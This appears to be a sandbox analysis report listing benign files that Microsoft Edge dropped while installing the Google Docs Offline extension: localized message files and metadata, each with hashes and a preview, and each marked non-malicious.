                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_1533588716\CRX_INSTALL\_locales\sw\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):980
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.50673686618174
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgNHCBxNx1HMHyMhybK7QGU78oCuafIvfCBxex6EYPE5E1pOCSUJqONtCBh8:1HAGDQ3y0Q/Kjp/zhDoKMkeAT6dBaX
                                                                                                                                                                                                                                                                                          MD5:D0579209686889E079D87C23817EDDD5
                                                                                                                                                                                                                                                                                          SHA1:C4F99E66A5891973315D7F2BC9C1DAA524CB30DC
                                                                                                                                                                                                                                                                                          SHA-256:0D20680B74AF10EF8C754FCDE259124A438DCE3848305B0CAF994D98E787D263
                                                                                                                                                                                                                                                                                          SHA-512:D59911F91ED6C8FF78FD158389B4D326DAF4C031B940C399569FE210F6985E23897E7F404B7014FC7B0ACEC086C01CC5F76354F7E5D3A1E0DEDEF788C23C2978
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wengine popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_1533588716\CRX_INSTALL\_locales\ta\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1941
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.132139619026436
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAoTZwEj3YfVLiANpx96zjlXTwB4uNJDZwq3CP1B2xIZiIH1CYFIZ03SoFyxrph:JCEjWiAD0ZXkyYFyPND1L/I
                                                                                                                                                                                                                                                                                          MD5:DCC0D1725AEAEAAF1690EF8053529601
                                                                                                                                                                                                                                                                                          SHA1:BB9D31859469760AC93E84B70B57909DCC02EA65
                                                                                                                                                                                                                                                                                          SHA-256:6282BF9DF12AD453858B0B531C8999D5FD6251EB855234546A1B30858462231A
                                                                                                                                                                                                                                                                                          SHA-512:6243982D764026D342B3C47C706D822BB2B0CAFFA51F0591D8C878F981EEF2A7FC68B76D012630B1C1EB394AF90EB782E2B49329EB6538DD5608A7F0791FDCF5
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "..... ....... .........".. },.. "explanationofflinedisabled": {.. "message": ".......... ........... .... ....... ..... Google ......... .........., ...... .... ........... ......... ...., Google ... ................... ................ ......, ........ ......... ..........".. },.. "explanationofflineenabled": {.. "message": ".......... ..........., .......... .......... .......... ......... ........... ...... .....

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_1533588716\CRX_INSTALL\_locales\te\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1969
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.327258153043599
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:R7jQrEONienBcFNBNieCyOBw0/kCcj+sEf24l+Q+u1LU4ljCj55ONipR41ssrNix:RjQJN1nBcFNBNlCyGcj+RXl+Q+u1LU4s
                                                                                                                                                                                                                                                                                          MD5:385E65EF723F1C4018EEE6E4E56BC03F
                                                                                                                                                                                                                                                                                          SHA1:0CEA195638A403FD99BAEF88A360BD746C21DF42
                                                                                                                                                                                                                                                                                          SHA-256:026C164BAE27DBB36A564888A796AA3F188AAD9E0C37176D48910395CF772CEA
                                                                                                                                                                                                                                                                                          SHA-512:E55167CB5638E04DF3543D57C8027B86B9483BFCAFA8E7C148EDED66454AEBF554B4C1CF3C33E93EC63D73E43800D6A6E7B9B1A1B0798B6BDB2F699D3989B052
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "..... ...... ........ ......".. },.. "explanationofflinedisabled": {.. "message": ".... ........... ........ ......... ........ ....... Google Docs... .............., .... ............ ....... ..... ...... .... Google Docs .... ...... ............. ......, ........ ........ ... .......".. },.. "explanationofflineenabled": {.. "message": ".... ........... ......., .... .... ........ .......... .... ....... ..... ....... .... ..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_1533588716\CRX_INSTALL\_locales\th\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1674
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.343724179386811
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:fcGjnU3UnGKD1GeU3pktOggV1tL2ggG7Q:f3jnDG1eUk0g6RLE
                                                                                                                                                                                                                                                                                          MD5:64077E3D186E585A8BEA86FF415AA19D
                                                                                                                                                                                                                                                                                          SHA1:73A861AC810DABB4CE63AD052E6E1834F8CA0E65
                                                                                                                                                                                                                                                                                          SHA-256:D147631B2334A25B8AA4519E4A30FB3A1A85B6A0396BC688C68DC124EC387D58
                                                                                                                                                                                                                                                                                          SHA-512:56DD389EB9DD335A6214E206B3BF5D63562584394D1DE1928B67D369E548477004146E6CB2AD19D291CB06564676E2B2AC078162356F6BC9278B04D29825EF0C
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": ".............. ............. Google .................................... ............................... Google ...... .................................................................".. },.. "explanationofflineenabled": {.. "message": "................................................................".. },.. "extdesc": {.. "message": "..... ..... ........

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_1533588716\CRX_INSTALL\_locales\tr\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1063
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.853399816115876
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAowYuBPgoMC4AGehrgGm7tJ3ckwFrXnRs5m:GYsPgrCtGehkGc3cvXr
                                                                                                                                                                                                                                                                                          MD5:76B59AAACC7B469792694CF3855D3F4C
                                                                                                                                                                                                                                                                                          SHA1:7C04A2C1C808FA57057A4CCEEE66855251A3C231
                                                                                                                                                                                                                                                                                          SHA-256:B9066A162BEE00FD50DC48C71B32B69DFFA362A01F84B45698B017A624F46824
                                                                                                                                                                                                                                                                                          SHA-512:2E507CA6874DE8028DC769F3D9DFD9E5494C268432BA41B51568D56F7426F8A5F2E5B111DDD04259EB8D9A036BB4E3333863A8FC65AAB793BCEF39EDFE41403B
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_1533588716\CRX_INSTALL\_locales\uk\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1333
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.686760246306605
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAk9oxkm6H4KyGGB9GeGoxPEYMQhpARezTtHUN97zlwpEH7:VKU1GB9GeBc/OARETt+9/WCb
                                                                                                                                                                                                                                                                                          MD5:970963C25C2CEF16BB6F60952E103105
                                                                                                                                                                                                                                                                                          SHA1:BBDDACFEEE60E22FB1C130E1EE8EFDA75EA600AA
                                                                                                                                                                                                                                                                                          SHA-256:9FA26FF09F6ACDE2457ED366C0C4124B6CAC1435D0C4FD8A870A0C090417DA19
                                                                                                                                                                                                                                                                                          SHA-512:1BED9FE4D4ADEED3D0BC8258D9F2FD72C6A177C713C3B03FC6F5452B6D6C2CB2236C54EA972ECE7DBFD756733805EB2352CAE44BAB93AA8EA73BB80460349504
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "........".. },.. "explanationofflinedisabled": {.. "message": ".. . ...... ....... ... ............. Google ........... ... ......... . .........., ......... . ............ .. ........ ........ Google .......... . ......... ......-............., .... ...... . .......".. },.. "explanationofflineenabled": {.. "message": ".. . ...... ......, ..... ... .... ...... .......... ........ ..... ... .......... .....".. },.. "extdesc": {.. "message": "........., ......... . ............ ........., .......... ....... .. ........... ... ....... .. ..........".. },.. "extname": {.. "message": "Goo

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_1533588716\CRX_INSTALL\_locales\ur\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1263
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.861856182762435
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAl3zNEUhN3mNjkSIkmdNpInuUVsqNtOJDhY8Dvp/IkLzx:e3uUhQKvkmd+s11Lp1F
                                                                                                                                                                                                                                                                                          MD5:8B4DF6A9281333341C939C244DDB7648
                                                                                                                                                                                                                                                                                          SHA1:382C80CAD29BCF8AAF52D9A24CA5A6ECF1941C6B
                                                                                                                                                                                                                                                                                          SHA-256:5DA836224D0F3A96F1C5EB5063061AAD837CA9FC6FED15D19C66DA25CF56F8AC
                                                                                                                                                                                                                                                                                          SHA-512:FA1C015D4EA349F73468C78FDB798D462EEF0F73C1A762298798E19F825E968383B0A133E0A2CE3B3DF95F24C71992235BFC872C69DC98166B44D3183BF8A9E5
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "... ......".. },.. "explanationofflinedisabled": {.. "message": ".. .. .... .... Google Docs .. .... ....... ..... ....... .... ..... .... ... .. .. ....... .. ..... ... .. Google Docs ... ... .. ....... .. ..... ... .. .... ...... ..... .. .. .....".. },.. "explanationofflineenabled": {.. "message": ".. .. .... ... .... .. ... ... ...... ..... ... ..... .. .... ... .. ... ..... ... .... ....".. },.. "extdesc": {.. "message": ".......... .......... ... ....... . .... ... ....... .. ..... .. .... ...... ..... .... ... ..... .......".. },.. "extname": {.. "message": "Google Docs .. ....".. },.. "learnmore": {..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_1533588716\CRX_INSTALL\_locales\vi\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1074
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.062722522759407
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAhBBLEBOVUSUfE+eDFmj4BLErQ7e2CIer32KIxqJ/HtNiE5nIGeU+KCVT:qHCDheDFmjDQgX32/S/hI9jh
                                                                                                                                                                                                                                                                                          MD5:773A3B9E708D052D6CBAA6D55C8A5438
                                                                                                                                                                                                                                                                                          SHA1:5617235844595D5C73961A2C0A4AC66D8EA5F90F
                                                                                                                                                                                                                                                                                          SHA-256:597C5F32BC999746BC5C2ED1E5115C523B7EB1D33F81B042203E1C1DF4BBCAFE
                                                                                                                                                                                                                                                                                          SHA-512:E5F906729E38B23F64D7F146FA48F3ABF6BAED9AAFC0E5F6FA59F369DC47829DBB4BFA94448580BD61A34E844241F590B8D7AEC7091861105D8EBB2590A3BEE9
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_1533588716\CRX_INSTALL\_locales\zh_CN\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):879
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.7905809868505544
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgteHCBxNtSBXuetOrgIkA2OrWjMOCBxetSBXK01fg/SOiCSUEQ27e1CBhUj:1HAFsHtrIkA2jqldI/727eggcLk9pf
                                                                                                                                                                                                                                                                                          MD5:3E76788E17E62FB49FB5ED5F4E7A3DCE
                                                                                                                                                                                                                                                                                          SHA1:6904FFA0D13D45496F126E58C886C35366EFCC11
                                                                                                                                                                                                                                                                                          SHA-256:E72D0BB08CC3005556E95A498BD737E7783BB0E56DCC202E7D27A536616F5EE0
                                                                                                                                                                                                                                                                                          SHA-512:F431E570AB5973C54275C9EEF05E49E6FE2D6C17000F98D672DD31F9A1FAD98E0D50B5B0B9CF85D5BBD3B655B93FD69768C194C8C1688CB962AA75FF1AF9BDB6
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "..".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ................ Google ....................".. },.. "explanationofflineenabled": {.. "message": ".............................".. },.. "extdesc": {.. "message": "...................... - ........".. },.. "extname": {.. "message": "Google .......".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "...............................".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_1533588716\CRX_INSTALL\_locales\zh_HK\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1205
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.50367724745418
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:YWvqB0f7Cr591AhI9Ah8U1F4rw4wtB9G976d6BY9scKUrPoAhNehIrI/uIXS1:YWvl7Cr5JHrw7k7u6BY9trW+rHR
                                                                                                                                                                                                                                                                                          MD5:524E1B2A370D0E71342D05DDE3D3E774
                                                                                                                                                                                                                                                                                          SHA1:60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
                                                                                                                                                                                                                                                                                          SHA-256:30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
                                                                                                                                                                                                                                                                                          SHA-512:D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_1533588716\CRX_INSTALL\_locales\zh_TW\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):843
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.76581227215314
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgmaCBxNtBtA24ZOuAeOEHGOCBxetBtMHQIJECSUnLRNocPNy6CBhU5OGg1O:1HAEfQkekYyLvRmcPGgzcL2kx5U
                                                                                                                                                                                                                                                                                          MD5:0E60627ACFD18F44D4DF469D8DCE6D30
                                                                                                                                                                                                                                                                                          SHA1:2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
                                                                                                                                                                                                                                                                                          SHA-256:F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
                                                                                                                                                                                                                                                                                          SHA-512:6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": ".....".. },.. "explanationofflinedisabled": {.. "message": ".................. Google ................ Google .................".. },.. "explanationofflineenabled": {.. "message": ".........................".. },.. "extdesc": {.. "message": ".............................".. },.. "extname": {.. "message": "Google .....".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "................................".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_1533588716\CRX_INSTALL\_locales\zu\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):912
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.65963951143349
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
                                                                                                                                                                                                                                                                                          MD5:71F916A64F98B6D1B5D1F62D297FDEC1
                                                                                                                                                                                                                                                                                          SHA1:9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
                                                                                                                                                                                                                                                                                          SHA-256:EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
                                                                                                                                                                                                                                                                                          SHA-512:30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_1533588716\CRX_INSTALL\_metadata\verified_contents.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):11406
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.745845607168024
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:RBG1G1UPkUj/86Op//Ier/2nsNLJtwg+K8HNnswuH+svyw6r+cgTSJJT4LGkt:m8IEI4u8/EgG4
                                                                                                                                                                                                                                                                                          MD5:0A68C9539A188B8BB4F9573F2F2321D6
                                                                                                                                                                                                                                                                                          SHA1:E0F814FA4DCC04EDC6A5D39CBC1038979E88F0E5
                                                                                                                                                                                                                                                                                          SHA-256:39E6C25D096AFD156644F07586D85E37F1F7B3DA9B636471E8D15CEB14DB184F
                                                                                                                                                                                                                                                                                          SHA-512:13F133C173C6622B8E1B6F86A551CBC5B0B2446B3CF96E4AE8CA2646009B99E4A360C2DB3168CB94A488FAEBD215003DFA60D10150B7A85B5F8919900BD01CCC
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiIxMjgucG5nIiwicm9vdF9oYXNoIjoiZ2NWZy0xWWgySktRNVFtUmtjZGNmamU1dzVIc1JNN1ZCTmJyaHJ4eGZ5ZyJ9LHsicGF0aCI6Il9sb2NhbGVzL2FmL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJxaElnV3hDSFVNLWZvSmVFWWFiWWlCNU9nTm9ncUViWUpOcEFhZG5KR0VjIn0seyJwYXRoIjoiX2xvY2FsZXMvYW0vbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IlpPQWJ3cEs2THFGcGxYYjh4RVUyY0VkU0R1aVY0cERNN2lEQ1RKTTIyTzgifSx7InBhdGgiOiJfbG9jYWxlcy9hci9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiUjJVaEZjdTVFcEJfUUZtU19QeGstWWRrSVZqd3l6WEoxdURVZEMyRE9BSSJ9LHsicGF0aCI6Il9sb2NhbGVzL2F6L21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJZVVJ3Mmp4UU5Lem1TZkY0YS1xcTBzbFBSSFc4eUlXRGtMY2g4Ry0zdjJRIn0seyJwYXRoIjoiX2xvY2FsZXMvYmUvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IjNmRm9XYUZmUHJNelRXSkJsMXlqbUlyRDZ2dzlsa1VxdzZTdjAyUk1oVkEifSx7InBhdGgiOiJfbG9jYWxlcy9iZy9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiSXJ3M3RIem9xREx6bHdGa0hjTllOWFoyNmI0WWVwT2t4ZFN

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_1533588716\CRX_INSTALL\dasherSettingSchema.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):854
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.284628987131403
                                                                                                                                                                                                                                                                                          Encrypted:false
